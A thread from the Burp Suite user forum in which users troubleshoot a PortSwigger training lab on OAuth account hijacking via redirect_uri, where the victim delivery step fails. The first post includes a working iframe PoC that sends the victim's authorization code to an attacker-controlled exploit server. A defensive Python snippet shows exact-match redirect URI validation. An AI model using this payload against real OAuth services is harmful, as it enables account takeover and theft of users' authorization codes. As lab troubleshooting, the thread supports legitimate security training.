The Burp Suite User Forum was discontinued on the 1st November 2024.


OAuth account hijacking via redirect_uri

Andre | Last updated: Jul 25, 2024 08:38AM UTC

I am working on the following lab: https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri

I have followed the solution instructions. PoC:

<iframe src=https://oauth-0a5a009e035314258017744f02780029.oauth-server.net/auth?client_id=bbqce1dfey29kwqs6iloa&redirect_uri=https://exploit-0a6900b7036a148280c4753501fa00ff.exploit-server.net&response_type=code&scope=openid%20profile%20email></iframe>

When I click ‘View Exploit’, the PoC works and I see the code in the access logs. But after storing the payload, and then clicking ‘Deliver to Victim’, no code arrives. Is this a bug?
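
The weakness the lab exercises is an authorization server that redirects the code to whatever redirect_uri the request carries. As an added illustration (not code from the lab or from PortSwigger), the check below contrasts that behaviour with an exact-match validation against the client's registered callback; the client_id is the one in the PoC above, while the registered callback URL is a constructed placeholder.

```python
import secrets
from urllib.parse import urlencode, urlsplit

# Registered redirect URIs per client. The client_id is the one from the lab
# PoC; the callback URL is a constructed placeholder, not the lab's real one.
REGISTERED_REDIRECTS = {
    "bbqce1dfey29kwqs6iloa": {"https://client.example/oauth-callback"},
}


def weak_redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """The failure mode the lab demonstrates: any https URL is accepted, so the
    authorization code can be sent to an attacker-controlled host."""
    return client_id in REGISTERED_REDIRECTS and redirect_uri.startswith("https://")


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Hardened check: exact string match against the URIs registered for this
    client (RFC 6749 section 3.1.2.2); no prefix, wildcard or substring match."""
    allowed = REGISTERED_REDIRECTS.get(client_id)
    if not allowed or not redirect_uri:
        return False
    parts = urlsplit(redirect_uri)
    # Reject anything that is not an absolute https URL, or that carries a
    # fragment or embedded credentials, before comparing.
    if parts.scheme != "https" or not parts.netloc or parts.fragment or "@" in parts.netloc:
        return False
    return redirect_uri in allowed


def handle_authorize(params: dict) -> tuple[int, str]:
    """Simplified authorization endpoint. Returns (status, location_or_body)."""
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri", "")
    if not redirect_uri_allowed(client_id, redirect_uri):
        # Report the error locally; never redirect to an unvalidated URI.
        return 400, "invalid_request: redirect_uri is not registered for this client"
    query = {"code": secrets.token_urlsafe(32)}
    if params.get("state"):
        query["state"] = params["state"]
    return 302, f"{redirect_uri}?{urlencode(query)}"
```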

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:41AM UTC

Hi Andre, as noted in your other forum post, we have received your email about this, so we will respond from there in due course.

c4rb0n | Last updated: Oct 23, 2024 02:53PM UTC

Hello, I have the same issue - I don't see any other user in "Access log" after "Deliver exploit to victim". Looks like a bug and a nasty one, because it's one of the labs from Exam preparation steps :c

Ben, PortSwigger Agent | Last updated: Oct 24, 2024 10:51AM UTC

Hi, If you try this in more than one lab instance (if you wait for your current instance to expire and then relaunch the lab so that you receive a lab with a different URL) are you ultimately able to solve this or do you still experience this issue?

c4rb0n | Last updated: Oct 24, 2024 11:25AM UTC

Hello, Yes, it's the same issue still:

2024-10-24 11:24:36 +0000 "POST / HTTP/1.1" 302
2024-10-24 11:24:36 +0000 "GET /deliver-to-victim HTTP/1.1" 302
2024-10-24 11:24:37 +0000 "GET / HTTP/1.1" 200
2024-10-24 11:24:37 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200

Nothing else... Does it work for you?

c4rb0n | Last updated: Oct 24, 2024 12:01PM UTC